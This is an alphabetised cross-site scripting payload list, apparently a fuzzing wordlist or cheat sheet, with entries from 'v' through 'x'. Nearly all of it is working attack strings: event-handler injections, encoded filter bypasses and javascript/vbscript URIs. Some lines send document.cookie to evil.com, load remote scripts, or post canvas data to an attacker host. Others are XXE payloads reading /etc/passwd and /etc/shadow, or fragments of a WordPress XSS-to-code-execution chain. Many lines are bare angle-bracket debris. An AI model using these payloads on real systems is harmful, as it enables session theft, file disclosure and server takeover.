- [unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
- (unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
- unescape(escape(“????????”).replace(/u../g,’’))
- ;(unescape=eval);
- ;(unescape=eval); // redeclare functions
- ?URI=javascript:alert(1)”,
- */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())’%3E%3C%%20style=’x:expression/*
- url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E”>
- ?url=javascript:alert(1)”,
- <url>javascript:alert(document.domain)</url>
- [url=javascript:alert(‘XSS’);]click me[/url]
- ‘/(\/\*.*\*\/)/Us’,
- uscriptualert(EXSSE)u/scriptu
- ?userDefined=’);function someFunction(a){}alert(1)//”,
- utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
- UTF-7: +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
- utf-8&v=XSS
- +/v8-+ADw-script+AD4-alert(28)+ADw-/script+AD4-
- <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
- <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
- <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:confirm(document.location);”>
- “”+{valueOf:alert}
- valueOf=alert;
- -{valueOf(){alert`:D`}}
- valueOf=alert;this+1;
- -{valueOf:location,toString:[].pop,0:javascript:alert%281%29.source,length:1}
- values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- var a=0; ((a == 1) ? 2 : confirm(1));//
- var a = ��foo��/alert(9)//��;
- var a = ��foo��&&alert(9)//��;
- var a = ��foo��+alert(9)//��;
- var a= <%=str_a%>
- “){};var b=’al’+’ert()’;eval(b);if(shit=”
- var buttons =$(“[data-role=button]”);
- var data = “jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;document.documentElement.innerHTML = data;
- var data = “jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;document.head.outerHTML = data;
- var data = “jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;document.write(data);document.close();
- variable[<script>]=*alert(1)</script>
- var m=’alert(0)’;var o=’’;for(var i=0;i<m.length;i++) {o+=’\\’+(m[i].charCodeAt().toString(8));}[][‘\143\157\156\163\164\162\165\143\164\157\162’][‘\143\157\156\163\164\162\165\143\164\157\162’](‘\141\154\145\162\164\50\60\51’)();[][‘constructor’][‘constructor’]
- var n = {a: “-alert(1)}//\”, b: “-alert(1)}//\”};
- var n = {a: “\”, b: “-alert(1)}//”};
- var n = {a: “$p”, b: “$p”};
- var n = {a: “$p”, b: “$q”};
- <var onmouseover=”prompt(1)”>KCF</var>
- <var onmouseover=”prompt(1)”>On Mouse Over</var>?
- <var onmouseover=”prompt(1)”>On Mouse Over</var>
- <var onmouseover=”prompt(1)”>renwax23</var>
- var q:String=loaderInfo.parameters[“q”].split(“\\”).join(“\\\\”);
- var re = /jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e/;
- var rewrittenBindings =ko.expressionRewriting.preProcessBindings(bindingsString, options),
- var str = ‘jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’;
- var str = “jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;
- “var x=new XMLHttpRequest();x.open(‘GET’,’//0');x.send();
- var{x:x,x=alert(1)}=1;
- var{x:y,}=1
- vbscript & # 00058; alert (1);
- vbscript:confirm(1);
- vbscript:alert(1);
- vbscript: alert (1);
- vbscript:alert(1);
- vbscript:alert(1); vbscript:alert(1); vbscr	ipt:alert(1)”
- vbscript:confirm(1);
- vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- vbscript:Msgbox+1
- vbscript:prompt(1)#{“action”:1}
- vbscr & Tab; ipt: alert (1) “
- vbscr	ipt:alert(1)”
- vbscr	ipt:confirm(1)”
- v=d.createElement(‘video’);
- v=d.createElement(video);
- veris →group<svg/onload=alert(/XSS/)//
- <videogt;<source onerror=javascript:prompt(911)gt;
- <video id=XSS poster=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))//
- video-js.swf?readyFunction=alert(1)
- video-js.swf?readyFunction=alert%28document.domain%2b’%20XSSed!’%29
- <video onclick=popup=1;>
- <video onerror=alert(1337) </poster>
- <VideO/**/OnerroR=~alert(“1”)+/SrC>
- <video onerror=”javascript:alert(1)”><source>//INJECTX
- <video onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”><source>
- <video onerror=”javascript:javascript:alert(1)”><source>
- <video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
- <video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
- <video onloadstart=alert(102)><source>
- <video onloadstart=alert(1)><source>
- <VidEo/oNLoaDStaRt=confirm(1)+/src>
- <video poster=javascript:alert(1)//></video>
- <video poster=javascript:javascript:alert(1)//
- <video/poster/onerror=alert()>
- <video/poster/onerror=alert(1)>
- <video/poster/onerror=prompt(1)>
- <video><source onerror=”alert(1)”>
- <video><source onerror=”javascript:alert(1)”>
- <video><source onerror=”javascript:alert(1)”>//INJECTX
- <Video> <source onerror = “javascript: alert (XSS)”>
- <video><source onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>
- <video><source onerror=”javascript:javascript:alert(1)”>
- <video><source o?UTF-8?Q?n?error=”confirm(1)”>
- <video src=1 href=1 onerror=”javascript:alert(1)”></video>
- <video src=1 onerror=alert(1)>
- <video src=”http://www.w3schools.com/html5/movie.ogg" onloadedmetadata=”alert(1)” />
- <video src=”http://www.w3schools.com/html5/movie.ogg" onloadstart=”alert(1)” />
- <video/src/id=”onerror”onloadstart=top[id]=confirm;throw”32">
- <video src=. onerror=prompt(0)>
- “<video src=. onerror=prompt(0)>”
- <video src=_ onloadstart=”alert(1)”>
- <video src onratechange=”alert(1)”>
- <video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))>
- <video src=x onerror=alert(48)>
- <video src=x onerror=prompt(1);>
- <video src=x onerror=prompt(1);>
- <video src=”x” onloadstart=”alert(1)”>
- <video src=”x” onloadstart=”confirm(1)”>
- <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
- vml.xml:<xml><rect style=”height:100%;width:100%” id=”xss” onmouseover=”alert(1)” strokecolor=”white” strokeweight=”2000px” filled=”false”/></xml>
- v.src=URL.createObjectURL(s);v.play()},function(){});
- vulnerable”%3B%20alert(%27Mondays%27)%3B%20"
- ([,?,,,,?]=””+{},[??,??,??,??,,???,???,???,,,???]=[!!?]+!?+?.?)[?+=?+???+???+??+??+??+?+??+?+??][?](???+???+??+??+??+”(-~?)”)() // (V_V)
- <w contenteditable id=x onfocus=alert()>
- Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
- $ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
- width: expression((window.r==document.cookie)?’’:alert(r=document.cookie))
- (window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
- window[“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]]](1)
- window.alert(1)
- window[“alert”](1)
- (window[��alert��])(9)
- window[��alert��](9)
- window.alert(“Bonjour !”);
- window.alert(“Bonjour !”);
- window[/alert/.source](9)
- window.location.assign(“http://xss.cx")
- window.location.replace(“http://stackoverflow.com");
- window.name
- window.name=’a\x01b’
- window.name=’hacked’;location.replace(‘about:blank’);
- window.name=”javascript:confirm((window.opener||window).document.cookie);”;
- window.open(‘http://target.com/?search=<svg/onload=window[localStorage.xss]=window.name//','javascript:alert(1)');
- window.open(“http://xss.cx","confirm(document.domain);", “”, false);
- window[Symbol.hasInstance]=eval
- win.location.href = “https://www.whatismyreferer.com";
- win = window.open(“https://www.paypal.com");
- with(document)alert(cookie)
- #with(document)body.appendChild(createElement
- with(document)body.appendChild(createElement(‘iframe onload=alert(1)>’),body.innerHTML+=”(IE)
- #with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
- with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
- with(document)getElementsByTagName(‘head’)[0].appendChild(createElement(‘script’)).src=’//?.ws’
- with(document.__parent__)alert(1)
- with(location)with(hash)eval(substring(1))
- with(top)body.appendChild (createElement(‘script’)).src=’//0'
- \”};with(window){onload=function(){ with(document){k=cookie;};with(window){location=’http://evil.com/?a=test'%2bk;};}}//;
- with(x)for(i=d=c.width=200;j=i — /d;fillStyle=R(d+i,d/j,arc(99+(i-79)*S(T(t)),S(3*j+S(t*7)/4)*75,j>.9?5:30*S(3*j+.3),0,7),fill()))beginPath()
- $=’_wpnonce=’+/ce” value=”([^”]*?)”/.exec(x.responseText)[1]+’&newcontent=<?=`$_GET[brute]`;&action=update&’+f
- // wp_xss2rce.js 1/3
- // wp_xss2rce.js 2/3
- www.site.com/test.php?var=text;alert(1)//
- www.site.com/test.php?var=textv;alert(1)//
- <w=”/x=”y>”/ondblclick=`<`[confir\u006d``]>z
- wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
- x=”<%”;
- <x>%00%00%00%00%00%00%00<script>alert(1)</script>
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <
- <
- <
- <
- <
- <
- <
- <
- <img src=1 onerror=confirm(1)>
- >
- >
- >
- >
- >
- >
- >
- >
- <\x00img src=’1' onerror=alert(0) />
- →<! — — \x00> <img src=xxx:x onerror=javascript:alert(1)> →
- “‘`><\x00img src=xxx:x onerror=javascript:alert(1)>
- ‘`”><\x00script>javascript:alert(1)</script>
- \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <x%09onxxx=1
- <x%09onxxx=1
- <x%09onxxx=142
- <x~%0Aonfocus=alert(26) id=a tabindex=0>
- <x%0Aonxxx=1
- <x%0Aonxxx=1
- <x%0Aonxxx=143
- [\x0B]onmosemove=confirm(‘\Done\’)>
- <x%0Conxxx=1
- <x%0Conxxx=1
- <x%0Conxxx=144
- <x%0Donxxx=1
- <x%0Donxxx=1
- <x%0Donxxx=145
- (X,)=>1
- /x:1/:///%01javascript:alert(document.cookie)/
- <x 1=’1'onxxx=1
- <x 1=’1'onxxx=1
- <x 1=”1"onxxx=1
- <x 1=’1'onxxx=147
- <x 1=”1"onxxx=148
- <x 1=”>” onxxx=1
- <x 1=”>” onxxx=1
- <x 1=”>” onxxx=150
- →<! — — \x21> <img src=xxx:x onerror=javascript:alert(1)> →
- x%22%3E%3Cimg%20src=%22x%22%3E%3C! — %2522%2527 — %253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E
- \x27-confirm`1`-\x27
- <x%2F1=”>%22OnXxx%3D1
- <x%2Fonxxx=1
- <x%2Fonxxx=1
- <x%2Fonxxx=146
- \x3c
- <
- <
- \x3C
- <
- <
- <
- <
- <
- <
- “‘`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
- \x3cimg\u0020src=1\u0020onerror=alert(1)\x3e
- \x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e
- ‘`”><\x3Cscript>javascript:alert(1)</script>
- ‘`”><\x3Cscript>javascript:alert(1)</script>
- \x3Cscript>javascript:alert(1)</script>
- \x3csVg/<sVg/oNloAd=alert()//>\x3e
- <script>alert('xss')</script>
- X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
- \x3e
- >
- >
- \x3E
- >
- >
- >
- >
- >
- >
- <! — \x3E<img src=xxx:x onerror=javascript:alert(1)> →
- →<! — — \x3E> <img src=xxx:x onerror=javascript:alert(1)> →
- `ĕ™ĔąĒĖb—ĈāĔĖ@9Ġĕĕ9A`Gĕ™ĔąĒĖb
- `ĕ™ĔąĒĖb—ĈāĔĖ@9Ġĕĕ9A`&#xĕ™ĔąĒĖb
- \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
- <x %6Fnerror=confirm(133)
- <x %6Fnxxx=1
- <x %6Fnxxx=1
- tţŃŢőŠŤvŁŔŅŢŤPGŰţţGQt&WţŃŢőŠŤv
- tţŃŢőŠŤvŁŔŅŢŤPGŰţţGQtWţŃŢőŠŤv
- “>/XaDoS/><script>alert(document.cookie)</script>
- “>/XaDoS/><script>alert(document.cookie)</script><script src=”http://www.site.com/XSS.js"></script>
- x”);$=alert, $(1);//
- !{x(){alert(1)}}.x()
- xa?</title><img src%3dx onerror%3dconfirm(1)>
- [\xC0][\xBC]script>alert(‘XSS’);[\xC0][\xBC]/script>
- [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
- x=’c2.drawImage(v,0,0,640,480);fetch(“//HOST/”+c2.canvas.toDataURL())’;
- x=c2.drawImage(v,0,0,640,480);fetch(//HOST/+c2.canvas.toDataURL());
- [][x=’constructor’][x](‘alert(1)’)()
- <x contenteditable onblur=alert(108)>lose focus!
- <x contenteditable onblur=alert(1)>lose focus!
- <x contenteditable onblur=alert(1)>lose focus!
- <x contenteditable onfocus=alert(115)>focus this!
- <x contenteditable onfocus=alert(1)>focus this!
- <x contenteditable onfocus=alert(1)>focus this!
- <x contenteditable oninput=alert(116)>input here!
- <x contenteditable oninput=alert(1)>input here!
- <x contenteditable oninput=alert(1)>input here!
- <x contenteditable onkeydown=alert(117)>press any key!
- <x contenteditable onkeydown=alert(1)>press any key!
- <x contenteditable onkeydown=alert(1)>press any key!
- <x contenteditable onkeypress=alert(118)>press any key!
- <x contenteditable onkeypress=alert(1)>press any key!
- <x contenteditable onkeypress=alert(1)>press any key!
- <x contenteditable onkeyup=alert(119)>press any key!
- <x contenteditable onkeyup=alert(1)>press any key!
- <x contenteditable onkeyup=alert(1)>press any key!
- <x contenteditable onpaste=alert(125)>paste here!
- <x contenteditable onpaste=alert(1)>paste here!
- <x contextmenu=”>”><a/value=”aaaaaaaaa”/onmousemove=%0Dprompt(196)%0A>#x
- <x data-bind=”.:confirm(1)”>
- <x data-bind=”.:\u0061lert(1)”>
- x=’ev’+’al’
- x=eval
- ��x:expr/**/ession(alert(1))��
- x:expr/**/ession(alert(1))
- x.fillText(“ASCII”,C=0,40)
- x.fillText(“Xo= “[C],t*54,Y*22)
- x.fillText(“Xw=^ “[C],t*54,Y*22)
- x.font=”3em’”
- x.font=”3em A”
- <x ‘=”foo”><x foo=’><img src=x onerror=alert(1)//’>
- <x ‘=”foo”><x foo=’><img src=x onerror=javascript:alert(1)//’>
- xlink:href=”javascript:alert(49)”>CLICKME</maction> </math>
- x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())
- x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())=>class x extends x{}()()();x()
- <xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
- <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas]]<![CDATA[cript:alert(‘XSS’);”>]]</C><X></xml>
- <xml ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
- <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=”;javas]]>;<;![CDATA[cript:alert(‘;XSS’;);”;>;]]>;
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]> </C></X></xml><SPAN DATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:javascript:alert(1);”>]]</C><X></xml>
- <XML ID=I><X><C><![<IMG SRC=”javas]]<![cript:document.vulnerable=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
- <xml id=”X”><a><b><script>alert(‘XSS’);</script>;<b></a></xml>
- <xml id=”X”><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
- <XML ID=”XSS”><I><B><IMG id=XSS SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATAid=XSS SRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(XSS^
- <;XML ID=”;xss”;>;<;I>;<;B>;<;IMG SRC=”;javas<;! — →;cript:alert(‘;XSS’;)”;>;<;/B>;<;/I>;<;/XML>;
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:document.vulnerable=true”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></span>
- <XML ID=”xss”><I><B><IMG SRC=”javas<! —
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML>
- <xml ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></xml><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <xml id=”xss” src=”%(htc)s”></xml> <label dataformatas=”html” datasrc=”#xss” datafld=”payload”></label>
- <XML id=XSS SRC=”http://xxxx.com/xsstest.xml" ID=I></XML>
- <XML id=XSS SRC=”xsstest.xml” ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
- <xml:namespace prefix=t><import namespace=t implementation=…..
- <?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
- xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
- xmlns:x=”http://w3.org/1999/xhtml “>alert(1)
- <xml onPropertyChange xml onPropertyChange=”javascript:javascript:alert(1)”></xml onPropertyChange>
- <;XML SRC=”;http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
- <XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML>
- <XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML src=”javascript:alert(‘X11SS’);”>
- <XML SRC=”javascript:alert(‘XSS’);”>
- <XML SRC=”javascript:alert(“XSS”)
- <xml src=”javascript:document.vulnerable=true;”>
- <XML SRC=”xsstest.xml” ID=I></XML>
- <XML SRC=”xsstest.xml” ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML SRC=”xsstest.xml” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <?xml-stylesheet href=”javascript:alert(1)”?><root/>
- <?xml-stylesheet type=”text/css”?><!DOCTYPE x SYSTEM “test.dtd”><x>&x;</x>
- <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
- <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
- <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/> // Works in IE7 ? http://html5sec.org/#77
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file://c:/boot.ini”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///dev/random”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/passwd”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/shadow”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[‘ or 1=1 or ‘’=’]]></foof>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘gotcha’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
- <?xml version=”1.0" encoding=”utf-8" ?><x:script
- <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'>
- <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
- <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
- <?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script></html>
- <?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(8)</script></html>
- <?xml version=”1.0"?><script xmlns=”http://www.w3.org/1999/xhtml">alert(9)</script>
- <?xml version=”1.0" ?><someElement><a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
- <?xml version=”1.0" ?><someElement> <a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
- <?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)”
- <?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)” xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
- <?xml version=”1.0"?><x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(27)</x:script>
- <xmp><img alt=”</xmp><img src=xx:x onerror=alert(1)//”>
- <xmp><img alt=”</xmp><img src=xx:x onerror=confirm(1)//”>
- <xmp><%</xmp><img alt=’%></xmp><img src=xx:x onerror=alert(1)//’>
- x=new class extends Function{}(‘alert(1)’);
- x=new class extends Function{}(‘alert(1)’);x=new x;
- x=new x;
- x=new XMLHttpRequest()
- x = new XMLHttpRequest();
- <x o%6Eerror=prompt(134)
- <x o%6Exxx=1
- <x o%6Exxx=1
- <x on%78error=confirm(135)
- <x on%78xx=1
- <x on%78xx=1
- <x onafterscriptexecute=alert(127)>
- <x onbeforescriptexecute=alert(128)>
- <x onclick=alert(109)>click this!
- <x onclick=alert(1)>click this!
- <x onclick=alert(1)>click this!
- <x oncontextmenu=alert(111)>right click this!
- <x oncontextmenu=alert(1)>right click this!
- <x oncontextmenu=alert(1)>right click this!
- <x oncopy=alert(110)>copy this!
- <x oncopy=alert(1)>copy this!
- <x oncopy=alert(1)>copy this!
- <x oncut=alert(112)>copy this!
- <x oncut=alert(1)>copy this!
- <x oncut=alert(1)>copy this!
- <x+oncut=y=prompt,y`1`>renwax23
- <x oncut=y=prompt,y``>z
- <x ondblclick=alert(113)>double click this!
- <x ondblclick=alert(1)>double click this!
- <x ondblclick=alert(1)>double click this!
- <x ondrag=alert(114)>drag this!
- <x ondrag=alert(1)>drag this!
- <x ondrag=alert(1)>drag this!
- <x onerror%3Dprompt(136)
- <x onload’=confirm(1)
- <x onmousedown=alert(120)>click this!
- <x onmousedown=alert(1)>click this!
- <x onmousedown=alert(1)>click this!
- <x onmouseenter=alert(126)>hover me!
- <x onmousemove=alert(121)>hover this!
- <x onmousemove=alert(1)>hover this!
- <x onmousemove=alert(1)>hover this!
- <x onmouseout=alert(122)>hover this!
- <x onmouseout=alert(1)>hover this!
- <x onmouseout=alert(1)>hover this!
- <x onmouseover=alert(1)>
- <x onmouseover=alert(123)>hover this!
- <x onmouseover=alert(1)>hover this!
- <x onmouseover=alert(1)>hover this!
- <x onmouseup=alert(124)>click this!
- <x onmouseup=alert(1)>click this!
- <x onmouseup=alert(1)>click this!
- x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}”
- <x onwebkitanimationend=alert(74)><style>X{animation:S}@keyframes S{}
- <x </onxxx=1
- <x </onxxx=1
- <x/onxxx=1
- <x/onxxx=1
- <x OnXxx=1
- <x OnXxx=1
- <X onxxx=1
- <X onxxx=1
- <X OnXxx=1
- <X OnXxx=1
- <X onxxx=137
- <x OnXxx=138
- <X OnXxx=139
- <x onxxx=140 onxxx=1400
- <x/onxxx=141
- <x </onxxx=149
- <x onxxx=1 onxxx=1
- <x onxxx%3D1
- <x onxxx=alert(1) 1=’
- <x onxxx=alert(152) 152=’
- x.open(‘GET’,p+f,0)
- x.open(POST, home.php, true);
- ?x=<script%20src=data:&x=alert(1);>
- “><<x>script>confirm(2)<<x>/<x>script>
- x’\”></script><img src=x onerror=alert(1)>
- <x:script xmlns:x=”https://sql--injection.blogspot.co.uk">alert('xss');</x:script>
- <x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(1);</x:script>
- <x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert('xss');</x:script>
- x.send()
- x.send(post=</textarea><br><a href= + document.URL + >Check this!</a>);
- x.setRequestHeader(Content-type, application/x-www-form-urlencoded);
- x setter=eval,x=1
- ;! — “<XSS>=&{()}”
- // XSS //
- ‘;’;;! — “;<;XSS>;=&;{()}
- ‘’;! — “<XSS>=&{()}
- xss:ex/*XSS*//*/* ?/pression(alert(“XSS”))’>
- xss:ex/*XSS*//**pression(alert(“XSS”))’>
- /?xss=500); alert(document.cookie);//
- xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’>
- !#$%&’*+-/=?^@xss.cx”>_`{}|~@xss.cx
- xss:expression(alert(/Xss/)
- xss:expression(alert(/Xss-By-Muhaddi/)
- {}*{xss:expression(open(alert(1)))}
- xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- <! XSS=”><img src=xx:x onerror=alert(1)//”>
- <! XSS=”><img src=xx:x onerror=confirm(1)//”>
- [XSS](javascript:confirm(6))
- <xss><script>alert(‘WXSS’)</script></vulnerable>
- xss →<! — <script>xss
- <XSS STYLE=”behavior: url(%(htc)s);”>
